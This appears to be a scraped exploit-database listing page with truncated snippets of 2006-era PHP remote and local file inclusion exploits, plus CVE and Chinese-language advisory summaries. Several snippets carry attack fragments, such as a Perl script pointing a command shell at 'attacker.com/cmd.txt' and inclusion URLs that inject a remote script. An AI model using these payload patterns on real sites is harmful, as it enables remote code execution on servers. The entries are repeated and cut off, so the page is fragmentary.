Drake CMS 0.2.3 ALPHA rev.916 - Remote File Inclusion

Drake CMS 0.2.3 ALPHA rev.916 - Remote File Inclusion Coding 4 Fun c4f.pl Drake CMS v0.2.2 ALPHA rev.846 http://drakecms.org ; Class = Remote File Inclusion ; Download = https://sourceforge.net/project/showfiles.php?groupid=166901&packageid=192077&releaseid=420102 ; Found by = GregStar...

Lithium CMS <= 4.04c (classes/index.php) Local File Include Exploit

No description provided by source. ? print ' ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:+ +:+...

Lithium CMS <= 4.04c (classes/index.php) Local File Include Exploit

Exploit for unknown platform in category web applications =================================================================== Lithium CMS = 4.04c classes/index.php Local File Include Exploit =================================================================== ? print ' ::::::::: :::::::::: ::: :::...

Article System 0.6 - volume.php Remote File Inclusion

Article System 0.6 - volume.php Remote File Inclusion Coding 4 Fun c4f.pl Article System 0.6 ; Class = Remote File Inclusion ; Download = http://sourceforge.net/project/showfiles.php?groupid=49971&packageid=43403&releaseid=325871 ; Found by = GregStar gregstaratc4fdotpl ;...

Lithium CMS 4.04c - &#039;/classes/index.php&#039; Local File Inclusion

DEVIL TEAM IRC: 72.20.18.6:6667 devilteam ======== Contact: [email protected] or http://www.rahim.webd.pl/ cod3d by Kacper -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Greetings DragonHeart and all DEVIL TEAM Patriots : - Leito & Leon TomZen, Gelo, Ramzes, DMX,...

PHP News Reader &lt;= 2.6.4 (phpbb.inc.php) Remote File Include Exploit

No description provided by source. !/usr/bin/perl PHP News Reader Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://pnews.sourceforge.net/ use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ====== Change This Li...

Nitrotech 0.0.3a (includes/common.php) Remote Code Execution Exploit

Exploit for unknown platform in category web applications ==================================================================== Nitrotech 0.0.3a includes/common.php Remote Code Execution Exploit ==================================================================== !/usr/bin/php -q -d shortopentag=o...

SourceForge &lt;= 1.0.4 (database.php) Remote File Include Exploit

No description provided by source. !/usr/bin/perl SourceForge-1.0.4 remote Command Execution Vulnerabilities Risk : High Remote Code Execution Url: http://lbdpc15.epfl.ch/ibd/IBD2000/SourceForge-1.0.4.tgz Exploit: http://site.com/path/include/database.php?sysdbtype=EvilScript coded and f0und3d by...

Simple Website Software 0.99 - common.php File Inclusion

Simple Website Software 0.99 - common.php File Inclusion =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Script: Simple Website Software v0.99 common.php Remote File Include...

Electronic Engineering Tool (EE TOOL) &lt;= 0.4.1 File Include Vulnerability

No description provided by source. Script Download: http://kent.dl.sourceforge.net/sourceforge/eetool/eetool-0.4-1.tar.gz Code: if$type == 1 $url = "$cgipath" . "ipcalc.cgi"; else $url = "$cgipath" . "ipcalc.cgi?host=$host&mask1=$mask1&mask2=$mask2"; nclude"$url";...

Electronic Engineering Tool (EE TOOL) 0.4.1 - Remote File Inclusion

Electronic Engineering Tool EE TOOL 0.4.1 - Remote File Inclusion Script Download: http://kent.dl.sourceforge.net/sourceforge/eetool/eetool-0.4-1.tar.gz Code: if$type == 1 $url = "$cgipath" . "ipcalc.cgi"; else $url = "$cgipath" . "ipcalc.cgi?host=$host&mask1=$mask1&mask2=$mask2"; nclude"$url";...

CVE-2006-5562

PHP remote file inclusion vulnerability in include/database.php in SourceForge aka alexandria 1.0.4 allows remote attackers to execute arbitrary PHP code via the sysdbtype parameter...

CVE-2006-5562

PHP remote file inclusion vulnerability in include/database.php in SourceForge aka alexandria 1.0.4 allows remote attackers to execute arbitrary PHP code via the sysdbtype parameter...

CVE-2006-5562

SourceForge (aka alexandria) 1.0.4 is affected by a PHP remote file inclusion via the sys_dbtype parameter in include/database.php, enabling arbitrary PHP code execution. The CVSS base score is 7.5 (HIGH) with network access, low attack complexity, and no authentication required. No exploitation ...

SourceForge database.php远程文件包含漏洞

SourceForge是用于协助开源软件开发的在线Web应用。 SourceForge在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。 SourceForge的 include/database.php 脚本没有对sysdbtype变量数据做充分的检查过滤，远程攻击者可能利用此漏洞使服务器包含远程服务器上的PHP代码执行。 sourceforge SourceForge 1.0.4 我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：...

GraphicsMagick PALM及DCM图形处理溢出漏洞

GraphicsMagick是一个简单的图像处理工具。 GraphicsMagick的coders/dcm.c文件中ReadDCMImage函数在处理特制DCM图形时存在缓冲区溢出漏洞；coders/palm.c文件中ReadPALMImage函数处理特制PALM图形时也存在堆溢出漏洞。成功利用这些漏洞的攻击者可以在用户系统上执行任意指令。 GraphicsMagick Group GraphicsMagick 1.1.7-9 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：...

GNU Mailman跨站脚本及拒绝服务漏洞

GNU Mailman是一款开放源码的邮件列表管理系统。 Mailman中存在多个安全漏洞，具体如下： 1 日志功能中的错误允许攻击者通过特制的URL向错误日志中注入欺骗性的日志消息。这可能诱骗管理员访问恶意的Web站点。 2 Mailman在处理畸形MIME首部时没有遵循RFC 2231标准，可能导致拒绝服务。 3 Mailman没有正确过滤某些用户输入，允许在用户浏览器会话中执行任意HTML和脚本代码。 受影响系统： GNU Mailman 2.1.9 不受影响系统： GNU Mailman 2.1.9rc1 GNU Mailman 2.1.9 厂商补丁： GNU ---...

EZ-Ticket v0.0.1 Remote File Inclusion Vulnerability

EZ-Ticket v0.0.1 Remote File Inclusion Vulnerability Download: http://prdownloads.sourceforge.net/ezt/ezt-0.01.tar.gz?download Found By: the master nidhal exploit: http://Target/Path/common.php?eztrootpath=http://cmd.gif? milw0rm.com 2006-10-22...

SourceForge <= 1.0.4 (database.php) Remote File Include Exploit

Exploit for unknown platform in category web applications =============================================================== SourceForge Romanian Security Team .: hTTp://RST-CREW.NET :. Shoutz to Oo, str0ke, th0r and all members of RST ! use LWP::Simple; print...

SourceForge 1.0.4 - &#039;database.php&#039; Remote File Inclusion

!/usr/bin/perl SourceForge-1.0.4 remote Command Execution Vulnerabilities Risk : High Remote Code Execution Url: http://lbdpc15.epfl.ch/ibd/IBD2000/SourceForge-1.0.4.tgz Exploit: http://site.com/path/include/database.php?sysdbtype=EvilScript coded and f0und3d by Kw3RLn Romanian Security Team .:...